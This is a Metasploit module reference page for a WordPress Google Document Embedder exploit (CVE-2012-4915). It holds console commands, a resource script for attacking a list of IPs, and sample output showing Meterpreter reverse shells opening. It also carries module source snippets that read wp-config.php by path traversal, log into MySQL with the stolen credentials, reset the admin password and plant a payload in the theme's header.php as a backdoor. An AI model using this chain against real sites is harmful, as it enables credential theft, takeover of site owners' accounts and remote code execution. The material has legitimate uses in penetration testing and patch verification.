WordPress Plugin Google Document Embedder Arbitrary File Disclosure - Metasploit


This page contains detailed information about how to use the exploit/unix/webapp/wp_google_document_embedder_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: WordPress Plugin Google Document Embedder Arbitrary File Disclosure
Module: exploit/unix/webapp/wp_google_document_embedder_exec
Source code: modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb
Disclosure date: 2013-01-03
Last modification time: 2021-04-01 14:17:28 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2012-4915

This module exploits an arbitrary file disclosure flaw in the WordPress blogging software plugin known as Google Document Embedder. The vulnerability allows for database credential disclosure via the /libs/pdf.php script. The Google Document Embedder plug-in versions 2.4.6 and below are vulnerable. This exploit only works when the MySQL server is exposed on an accessible IP and WordPress has filesystem write access. Please note: The admin password may get changed if the exploit does not run to the end.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


Using wp_google_document_embedder_exec against a single host

Normally, you can use exploit/unix/webapp/wp_google_document_embedder_exec this way:

msf > use exploit/unix/webapp/wp_google_document_embedder_exec
msf exploit(wp_google_document_embedder_exec) > show targets
    ... a list of targets ...
msf exploit(wp_google_document_embedder_exec) > set TARGET target-id
msf exploit(wp_google_document_embedder_exec) > show options
    ... show and set options ...
msf exploit(wp_google_document_embedder_exec) > exploit

Using wp_google_document_embedder_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your wp_google_document_embedder_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/unix/webapp/wp_google_document_embedder_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the unix/webapp/wp_google_document_embedder_exec exploit module looks in the msfconsole:

msf6 > use exploit/unix/webapp/wp_google_document_embedder_exec

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_google_document_embedder_exec) > show info

       Name: WordPress Plugin Google Document Embedder Arbitrary File Disclosure
     Module: exploit/unix/webapp/wp_google_document_embedder_exec
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2013-01-03

Provided by:
  Charlie Eriksen

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  Yes

Basic options:
  Name         Current Setting      Required  Description
  ----         ---------------      --------  -----------
  ADMINPATH    wp-admin/            yes       The relative path to the admin folder
  PLUGINSPATH  wp-content/plugins/  yes       The relative path to the plugins folder
  Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT        80                   yes       The target port (TCP)
  SSL          false                no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /                    yes       The full URI path to WordPress
  THEMESPATH   wp-content/themes/   yes       The relative path to the admin folder
  VHOST                             no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary file disclosure flaw in the 
  WordPress blogging software plugin known as Google Document 
  Embedder. The vulnerability allows for database credential 
  disclosure via the /libs/pdf.php script. The Google Document 
  Embedder plug-in versions 2.4.6 and below are vulnerable. This 
  exploit only works when the MySQL server is exposed on an accessible 
  IP and WordPress has filesystem write access. Please note: The admin 
  password may get changed if the exploit does not run to the end.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2012-4915
  OSVDB (88891)
  http://secunia.com/advisories/50832
  https://wpscan.com/vulnerability/6073

Module Options


This is a complete list of options available in the unix/webapp/wp_google_document_embedder_exec exploit:

msf6 exploit(unix/webapp/wp_google_document_embedder_exec) > show options

Module options (exploit/unix/webapp/wp_google_document_embedder_exec):

   Name         Current Setting      Required  Description
   ----         ---------------      --------  -----------
   ADMINPATH    wp-admin/            yes       The relative path to the admin folder
   PLUGINSPATH  wp-content/plugins/  yes       The relative path to the plugins folder
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80                   yes       The target port (TCP)
   SSL          false                no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                    yes       The full URI path to WordPress
   THEMESPATH   wp-content/themes/   yes       The relative path to the admin folder
   VHOST                             no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the unix/webapp/wp_google_document_embedder_exec exploit:

msf6 exploit(unix/webapp/wp_google_document_embedder_exec) > show advanced

Module advanced options (exploit/unix/webapp/wp_google_document_embedder_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/webapp/wp_google_document_embedder_exec module can exploit:

msf6 exploit(unix/webapp/wp_google_document_embedder_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/webapp/wp_google_document_embedder_exec exploit:

msf6 exploit(unix/webapp/wp_google_document_embedder_exec) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   18  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)
   20  payload/php/shell_findsock                                   normal  No     PHP Command Shell, Find Sock

Evasion Options


Here is the full list of possible evasion options supported by the unix/webapp/wp_google_document_embedder_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/webapp/wp_google_document_embedder_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

allow_url_fopen and curl are both disabled


Here is a relevant code snippet related to the "allow_url_fopen and curl are both disabled" error message:

101:	          'file' => "#{'../' * plugins_uri.count('/')}wp-config.php",
102:	        }
103:	    })
104:	
105:	    if res and res.body =~ /allow_url_fopen/
106:	      fail_with(Failure::NotVulnerable, 'allow_url_fopen and curl are both disabled')
107:	    elsif res.code != 200
108:	      fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
109:	    end
110:	
111:	    config = parse_wp_config(res.body)

Unexpected reply - <RES.CODE>


Here is a relevant code snippet related to the "Unexpected reply - <RES.CODE>" error message:

103:	    })
104:	
105:	    if res and res.body =~ /allow_url_fopen/
106:	      fail_with(Failure::NotVulnerable, 'allow_url_fopen and curl are both disabled')
107:	    elsif res.code != 200
108:	      fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
109:	    end
110:	
111:	    config = parse_wp_config(res.body)
112:	    if not ['DB_HOST', 'DB_PORT', 'DB_USER', 'DB_PASSWORD', 'DB_NAME'].all? { |parameter| config.has_key?(parameter) }
113:	      fail_with(Failure::UnexpectedReply, "The config file did not parse properly")

The config file did not parse properly


Here is a relevant code snippet related to the "The config file did not parse properly" error message:

108:	      fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
109:	    end
110:	
111:	    config = parse_wp_config(res.body)
112:	    if not ['DB_HOST', 'DB_PORT', 'DB_USER', 'DB_PASSWORD', 'DB_NAME'].all? { |parameter| config.has_key?(parameter) }
113:	      fail_with(Failure::UnexpectedReply, "The config file did not parse properly")
114:	    end
115:	    begin
116:	      @mysql_handle = ::RbMysql.connect(config['DB_HOST'],
117:	                                        config['DB_USER'],
118:	                                        config['DB_PASSWORD'],

Unable to connect to the MySQL server


Here is a relevant code snippet related to the "Unable to connect to the MySQL server" error message:

121:	    rescue Errno::ECONNREFUSED,
122:	      RbMysql::ClientError,
123:	      Errno::ETIMEDOUT,
124:	      RbMysql::AccessDeniedError,
125:	      RbMysql::HostNotPrivileged
126:	      fail_with(Failure::NotVulnerable, 'Unable to connect to the MySQL server')
127:	    end
128:	    res = @mysql_handle.query("SELECT user_login, user_pass FROM #{config['DB_PREFIX']}users U
129:	                  INNER JOIN #{config['DB_PREFIX']}usermeta M ON M.user_id = U.ID AND M.meta_key = 'wp_user_level' AND meta_value = '10' LIMIT 1")
130:	
131:	    if res.nil? or res.size <= 0

No admin was account found


Here is a relevant code snippet related to the "No admin was account found" error message:

127:	    end
128:	    res = @mysql_handle.query("SELECT user_login, user_pass FROM #{config['DB_PREFIX']}users U
129:	                  INNER JOIN #{config['DB_PREFIX']}usermeta M ON M.user_id = U.ID AND M.meta_key = 'wp_user_level' AND meta_value = '10' LIMIT 1")
130:	
131:	    if res.nil? or res.size <= 0
132:	      fail_with(Failure::UnexpectedReply, 'No admin was account found')
133:	    end
134:	
135:	    user = res.first
136:	
137:	    new_password = rand_text_alphanumeric(8)

Admin password changed to: <NEW_PASSWORD>


Here is a relevant code snippet related to the "Admin password changed to: <NEW_PASSWORD>" error message:

134:	
135:	    user = res.first
136:	
137:	    new_password = rand_text_alphanumeric(8)
138:	    @mysql_handle.query("UPDATE #{config['DB_PREFIX']}users SET user_pass = '#{::Rex::Text.md5(new_password)}' WHERE user_login = '#{user[0]}'")
139:	    print_warning("Admin password changed to: #{new_password}")
140:	
141:	    admin_cookie = get_wp_cookie(uri, user[0], new_password)
142:	
143:	    theme, nonce, old_content = get_wp_theme(admin_uri, admin_cookie)
144:	

Editing theme <THEME>


Here is a relevant code snippet related to the "Editing theme <THEME>" error message:

140:	
141:	    admin_cookie = get_wp_cookie(uri, user[0], new_password)
142:	
143:	    theme, nonce, old_content = get_wp_theme(admin_uri, admin_cookie)
144:	
145:	    print_warning("Editing theme #{theme}")
146:	    set_wp_theme(admin_uri, admin_cookie, nonce, theme, payload.encoded)
147:	
148:	    print_status("Calling backdoor")
149:	    res = send_request_cgi({
150:	      'method' => 'GET',

Unexpected reply - <RES.CODE>


Here is a relevant code snippet related to the "Unexpected reply - <RES.CODE>" error message:

150:	      'method' => 'GET',
151:	      'uri'    => "#{themes_uri}#{theme}/header.php",
152:	    })
153:	
154:	    if res and res.code != 200
155:	      fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
156:	    end
157:	
158:	    set_wp_theme(admin_uri, admin_cookie, nonce, theme, old_content)
159:	
160:	    @mysql_handle.query("UPDATE #{config['DB_PREFIX']}users SET user_pass = '#{user[1]}' WHERE user_login = '#{user[0]}'")

Admin login failed


Here is a relevant code snippet related to the "Admin login failed" error message:

203:	          'testcookie' => '1',
204:	        },
205:	    })
206:	
207:	    if res and res.code == 200
208:	      fail_with(Failure::UnexpectedReply, 'Admin login failed')
209:	    elsif res and res.code != 302
210:	      fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
211:	    end
212:	
213:	    admin_cookie = res.get_cookies

Unexpected reply - <RES.CODE>


Here is a relevant code snippet related to the "Unexpected reply - <RES.CODE>" error message:

205:	    })
206:	
207:	    if res and res.code == 200
208:	      fail_with(Failure::UnexpectedReply, 'Admin login failed')
209:	    elsif res and res.code != 302
210:	      fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
211:	    end
212:	
213:	    admin_cookie = res.get_cookies
214:	
215:	    if admin_cookie.empty?

Here is a relevant code snippet related to the "The resulting cookie was empty" error message:

211:	    end
212:	
213:	    admin_cookie = res.get_cookies
214:	
215:	    if admin_cookie.empty?
216:	      fail_with(Failure::UnexpectedReply, 'The resulting cookie was empty')
217:	    end
218:	
219:	    return admin_cookie
220:	  end
221:	

Unexpected reply - <RES.CODE>


Here is a relevant code snippet related to the "Unexpected reply - <RES.CODE>" error message:

225:	      'uri'    => "#{admin_uri}theme-editor.php?file=header.php",
226:	      'cookie' => admin_cookie,
227:	    })
228:	
229:	    if res and res.code != 200
230:	      fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
231:	    elsif res and res.body.scan(/<input.+?name="submit".+?class="button button-primary"/).length == 0
232:	      fail_with(Failure::NotVulnerable, 'Wordpress does not have write access')
233:	    end
234:	
235:	    nonce = res.body.scan(/<input.+?id="_wpnonce".+?value="(.+?)"/)[0][0].to_s

Wordpress does not have write access


Here is a relevant code snippet related to the "Wordpress does not have write access" error message:

227:	    })
228:	
229:	    if res and res.code != 200
230:	      fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
231:	    elsif res and res.body.scan(/<input.+?name="submit".+?class="button button-primary"/).length == 0
232:	      fail_with(Failure::NotVulnerable, 'Wordpress does not have write access')
233:	    end
234:	
235:	    nonce = res.body.scan(/<input.+?id="_wpnonce".+?value="(.+?)"/)[0][0].to_s
236:	    old_content = Rex::Text.html_decode(Rex::Text.html_decode(res.body.scan(/<textarea.+?id="newcontent".+?>(.*)<\/textarea>/m)[0][0].to_s))
237:	    theme = res.body.scan(/<input.+?name="theme".+?value="(.+?)"/)[0][0].to_s

Unexpected reply - <RES.CODE>


Here is a relevant code snippet related to the "Unexpected reply - <RES.CODE>" error message:

252:	          'action'     => 'update',
253:	          'file'       => 'header.php'
254:	        },
255:	    })
256:	
257:	    if res and res.code != 302
258:	      fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
259:	    end
260:	  end
261:	end
262:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Charlie Eriksen

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.